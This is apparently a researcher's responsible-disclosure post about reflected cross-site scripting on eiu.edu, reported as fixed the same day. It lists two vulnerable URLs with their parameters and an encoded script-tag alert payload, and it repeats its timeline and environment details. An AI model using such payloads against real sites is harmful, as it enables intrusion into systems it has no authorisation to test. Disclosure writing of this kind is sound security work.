Vulnerability : Cross-Site Scripting (XSS) - Reflected
Domain : https://www.eiu.edu
Timeline :
Apr 29,2020 - Report Sent
Apr 29,2020 - Vulnerability Fixed
Apr 29,2020 - Thanks received
Environment :
OS : Windows 10 Enterprise
Browser : Firefox
Version : 75.0 ( 64-bit )
Researcher Name : Nayanjyoti Roy
Proof-Of-Concept video :
Domain : https://www.eiu.edu
Vulnerable URL 1 : https://www.eiu.edu/search/?q=
Vulnerable Parameter : q
Vulnerable URL 2 : https://www.eiu.edu/fdic/staff.php?type=&subcat=402?&menu=0
Vulnerable Parameter : type
XSS Payload (Encoded) : %22%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E
Timeline :
Apr 29,2020 - Report Sent
Apr 29,2020 - Vulnerability Fixed
Apr 29,2020 - Thanks received
Environment :
OS : Windows 10 Enterprise
Browser : Firefox
Version : 75.0 ( 64-bit )
Researcher Name : Nayanjyoti Roy
Proof-Of-Concept video :
0 Comments